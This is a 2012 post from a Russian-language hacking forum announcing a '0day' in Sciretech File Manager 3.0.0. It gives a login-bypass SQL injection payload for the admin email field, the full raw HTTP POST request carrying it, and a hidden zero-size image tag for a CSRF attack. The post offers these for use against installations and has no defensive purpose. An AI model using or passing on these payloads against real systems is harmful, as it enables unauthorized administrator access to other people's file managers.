1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

0day Sciretech File Manager Version 3.0.0

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем ResH, 22 сен 2012.

  1. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    Бага в версии Sciretech ® File Manager Version 3.0.0
    Офф сайт Please login or register to view links
    Бага Blind SQL Injection и CSRF
    Демо Please login or register to view links
    Email: admin@domain.com' and 99=99-- and 0='0
    PASS: что_хотите
    Ноте. Вы должны вводить валидный мейл адрес админа (например admin@наш_домен.com)


    Host: Please login or register to view links
    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Cookie: PHPSESSID=brn7te3s5dtkmo63578umm6kp7
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 123

    POST DATA:

    dbuser_user_email=admin%40domain.com%27+and+99%3D99--+and+0%3D%270&dbuser_user_password=WILL_BYPASS_IT_LIKE_2X2&login=Login

    Панел админа: Please login or register to view links

    Host: Please login or register to view links
    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Cookie: PHPSESSID=brn7te3s5dtkmo63578umm6kp7

    ____________________________________________________________
    CSRF

    <img src="Please login or register to view links" heigth="0" width="0" />

    Blinq SQL

    Please login or register to view links
     
    Метки:

Поделиться этой страницей

Загрузка...